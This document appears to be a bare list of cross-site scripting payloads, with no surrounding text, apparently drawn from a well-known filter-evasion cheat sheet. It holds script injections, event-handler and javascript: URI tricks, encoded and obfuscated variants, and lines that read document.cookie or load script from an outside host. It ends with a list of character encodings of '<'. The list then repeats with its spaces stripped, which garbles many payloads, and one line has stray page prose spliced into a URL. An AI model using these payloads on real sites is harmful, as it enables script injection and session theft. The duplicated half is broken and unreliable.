'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=
<IMG onmouseover="alert('xxs')">
<IMG SRC=&<IMG SRC="/" onerror=&
<IMG SRC=&<IMG SRC="/x" onerror=&
<IMG SRC=&<IMG SRC="/" onerror=&
<IMG SRC="/x" onerror="jav      ascript:alert('XSS');">
<IMG SRC="/" onerror="jav&
<IMG SRC="jav&
<IMG SRC="/x" onerror="jav&
<IMG SRC="/x" onerror="jav%00ascript:alert('XSS');">
<IMG SRC="/x" onerror=" &
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');"
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.
<DIV STYLE="background-image: url(&
<DIV STYLE="width: expression(alert('XSS'));">
<!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]-->
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<EMBED SRC="http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).:org/xss.swf" AllowScriptAccess="always"></EMBED>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML><SPAN DATASRC="
<XML SRC="xsstest.xml" ID=I></XML><SPAN DATASRC=
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<Video> <source onerror = "javascript: alert (XSS)">
<Input value = "XSS" type = text>
<applet code="javascript:confirm(document.cookie);">
<isindex x="javascript:" onmouseover="alert(XSS)">
"></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
"><img src="x:x" onerror="alert(XSS)">
"><iframe src="javascript:alert(XSS)">
<object data="javascript:alert(XSS)">
<isindex type=image src=1 onerror=alert(XSS)>
<img src=x:alert(alt) onerror=eval(src) alt=0>
<img src="x:gif" onerror="window['al\u0065rt'](0)"></img>
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/onerror='eval(src)'>
<style>//*{x:expression(alert(/xss/))}//<style></style>
<img src="/" =_=" title="onerror='prompt(1)'">
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe
<script x> alert(1) </script 1=2
<form><button formaction=javascript&colon;alert(1)>CLICKME
<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
(alert)(1)
a=alert,a(1)
[1].find(alert)
top[“al”+”ert”](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top[‘al\145rt’](1)
top[‘al\x65rt’](1)
top[8680439..toString(30)](1)
alert?.()
`${alert``}`
(alert())
<
%3C
&lt
&lt;
&LT
&LT;
&#60;
&#060;
&#0060;
&#00060;
&#000060;
&#0000060;
&#60;
&#060;
&#0060;
&#00060;
&#000060;
&#0000060;
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C
'';!--"<XSS>=&{()}
<SCRIPTSRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMGSRC="javascript:alert('XSS');">
<IMGSRC=JaVaScRiPt:alert('XSS')>
<IMGSRC=`javascript:alert("RSnakesays,'XSS'")`>
<aonmouseover="alert(document.cookie)">xxslink</a>
<aonmouseover=alert(document.cookie)>xxslink</a>
<IMG"""><SCRIPT>alert("XSS")</SCRIPT>">
<IMGSRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMGSRC=
<IMGonmouseover="alert('xxs')">
<IMGSRC=&<IMGSRC="/"onerror=&
<IMGSRC=&<IMGSRC="/x"onerror=&
<IMGSRC=&<IMGSRC="/"onerror=&
<IMGSRC="/x"onerror="javascript:alert('XSS');">
<IMGSRC="/"onerror="jav&
<IMGSRC="jav&
<IMGSRC="/x"onerror="jav&
<IMGSRC="/x"onerror="jav%00ascript:alert('XSS');">
<IMGSRC="/x"onerror="&
<SCRIPT/XSSSRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPTSRC=http://ha.ckers.org/xss.js?<B>
<SCRIPTSRC=//ha.ckers.org/.j>
<IMGSRC="javascript:alert('XSS')"
<iframesrc=http://ha.ckers.org/scriptlet.html<
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUTTYPE="IMAGE"SRC="javascript:alert('XSS');">
<BODYBACKGROUND="javascript:alert('XSS')">
<IMGDYNSRC="javascript:alert('XSS')">
<IMGLOWSRC="javascript:alert('XSS')">
<STYLE>li{list-style-image:url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMGSRC='vbscript:msgbox("XSS")'>
<BODYONLOAD=alert('XSS')>
<BGSOUNDSRC="javascript:alert('XSS');"
<LINKREL="stylesheet"HREF="javascript:alert('XSS');">
<LINKREL="stylesheet"HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<METAHTTP-EQUIV="Link"Content="<http://ha.ckers.org/xss.css>;REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMGSTYLE="xss:expr/*XSS*/ession(alert('XSS'))"
<STYLETYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><ACLASS=XSS></A>
<STYLEtype="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSSSTYLE="xss:expression(alert('XSS'))">
<XSSSTYLE="behavior:url(xss.htc);">
<METAHTTP-EQUIV="refresh"CONTENT="0;url=javascript:alert('XSS');">
<METAHTTP-EQUIV="refresh"CONTENT="0;url=data:text/htmlbase64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<METAHTTP-EQUIV="refresh"CONTENT="0;URL=http://;URL=javascript:alert('XSS');">
<IFRAMESRC="javascript:alert('XSS');"></IFRAME>
<IFRAMESRC=
<FRAMESET><FRAMESRC="javascript:alert('XSS');"></FRAMESET>
<TABLEBACKGROUND="javascript:alert('XSS')">
<TABLEBACKGROUND="javascript:alert('XSS')">
<TABLEBACKGROUND="javascript:alert('XSS')">
<DIVSTYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.
<DIVSTYLE="background-image:url(&
<DIVSTYLE="width:expression(alert('XSS'));">
<!--[ifgteIE4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
<BASEHREF="javascript:alert('XSS');//">
<OBJECTTYPE="text/x-scriptlet"DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<EMBEDSRC="http://ha.ckers.UsinganEMBEDtagyoucanembedaFlashmoviethatcontainsXSS.Clickhereforademo.IfyouaddtheattributesallowScriptAccess="never"andallownetworking="internal"itcanmitigatethisrisk(thankyoutoJonathanVanascofortheinfo).:org/xss.swf"AllowScriptAccess="always"></EMBED>
<EMBEDSRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="type="image/svg+xml"AllowScriptAccess="always"></EMBED>
<XMLID="xss"><I><B><IMGSRC="javas<!---->cript:alert('XSS')"></B></I></XML><SPANDATASRC="
<XMLSRC="xsstest.xml"ID=I></XML><SPANDATASRC=
<SCRIPTa=">"SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT=">"SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPTa=">"''SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPTa=">"''SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPTa=`>`SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPTa=">'>"SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPTa=">'>"SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<Imgsrc=xonerror="javascript:window.onerror=alert;throwXSS">
<Video><sourceonerror="javascript:alert(XSS)">
<Inputvalue="XSS"type=text>
<appletcode="javascript:confirm(document.cookie);">
<isindexx="javascript:"onmouseover="alert(XSS)">
"></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
"><imgsrc="x:x"onerror="alert(XSS)">
"><iframesrc="javascript:alert(XSS)">
<objectdata="javascript:alert(XSS)">
<isindextype=imagesrc=1onerror=alert(XSS)>
<imgsrc=x:alert(alt)onerror=eval(src)alt=0>
<imgsrc="x:gif"onerror="window['al\u0065rt'](0)"></img>
<iframe/src="data:text/html,<svgonload=alert(1)>">
<metacontent="&NewLine;1&NewLine;;JAVASCRIPT&colon;alert(1)"http-equiv="refresh"/>
<svg><scriptxlink:href=data&colon;,window.open('https://www.google.com/')></script
<metahttp-equiv="refresh"content="0;url=javascript:confirm(1)">
<iframesrc=javascript&colon;alert&lpar;document&period;location&rpar;>
<form><ahref="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/onerror='eval(src)'>
<style>//*{x:expression(alert(/xss/))}//<style></style>
<imgsrc="/"=_="title="onerror='prompt(1)'">
<aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaahref=j&#97v&#97script:&#97lert(1)>ClickMe
<scriptx>alert(1)</script1=2
<form><buttonformaction=javascript&colon;alert(1)>CLICKME
<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
<iframesrc="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<OBJECTCLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAMNAME="DataURL"VALUE="javascript:alert(1)"></OBJECT>
(alert)(1)
a=alert,a(1)
[1].find(alert)
top[“al”+”ert”](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top[‘al\145rt’](1)
top[‘al\x65rt’](1)
top[8680439..toString(30)](1)
alert?.()
`${alert``}`
(alert())
<
%3C
&lt
&lt;
&LT
&LT;
&#60;
&#060;
&#0060;
&#00060;
&#000060;
&#0000060;
&#60;
&#060;
&#0060;
&#00060;
&#000060;
&#0000060;
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C